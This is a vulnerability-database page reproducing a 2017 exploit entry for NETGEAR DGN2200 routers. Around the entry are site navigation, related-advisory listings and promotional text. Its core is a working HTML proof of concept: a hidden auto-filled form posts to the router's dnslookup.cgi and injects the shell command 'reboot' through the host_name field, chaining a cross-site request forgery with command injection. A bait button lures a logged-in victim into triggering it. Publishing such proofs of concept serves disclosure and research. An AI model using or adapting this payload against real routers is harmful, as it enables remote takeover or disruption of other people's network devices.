Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NETGEAR DGN2200v1v2v3v4 - Cross-Site Request Forgery

🗓️ 28 Feb 2017 00:00:00Reported by SivertPLType 
exploitpack
 exploitpack👁 25 Views

NETGEAR DGN2200v1-v4 CSRF RCE via CVE-2017-633

Related
Code
ReporterTitlePublishedViews
Family
0day.today		NETGEAR DGN2200 v1/v2/v3/v4 - dnslookup.cgi Remote Command Execution Exploit
27 Feb 201700:00
zdt
0day.today		NETGEAR DGN2200 v1/v2/v3/v4 - Cross-Site Request Forgery Vulnerability
28 Feb 201700:00
zdt
0day.today		Netgear DGN2200 - dnslookup.cgi Command Injection Exploit
26 Jun 201700:00
zdt
0day.today		VideoLAN VLC Media Player 2.2.5 EphemeralCockroach Heap Overflow Exploit
4 Mar 201800:00
zdt
ATTACKERKB		CVE-2017-6334
6 Mar 201700:00
attackerkb
ATTACKERKB		CVE-2017-6077
22 Feb 201700:00
attackerkb
BDU FSTEC		The vulnerability of the ping.cgi script in NETGEAR DGN2200v1 integrated router software allows a hacker to execute arbitrary commands and gain full control over the device.
14 Dec 201700:00
bdu_fstec
BDU FSTEC		The vulnerability of the ping.cgi script in NETGEAR DGN2200 router’s embedded software allows a hacker to execute arbitrary commands and gain full control over the device.
31 May 202300:00
bdu_fstec
Circl		CVE-2017-6077
24 May 201815:44
circl
Circl		CVE-2017-6334
25 Feb 201700:00
circl
Rows per page
# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
# Date: 2017-02-28
# Exploit Author: SivertPL
# Vendor Homepage: http://netgear.com/
# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
# Tested on: DGN2200v1,v2,v3,v4

# CVE: CVE-2017-6366

A quite dangerous CSRF was discovered on all DGN2200 firmwares.
When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.

<!DOCTYPE html>
<html>
	<title>netgear router CSRF</title>
	<body>
		<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
			<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
			<input type="hidden" name="lookup" value="Lookup">
			<button name="clc" value="clc">Would You Dare To?</button> 
		</form>
	</body>
</html>

<!-- 2017-02-27 by SivertPL -->

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Feb 2017 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.72199
netgeardgn2200csrfrcecve-2017-6334unauthenticatedrouter
25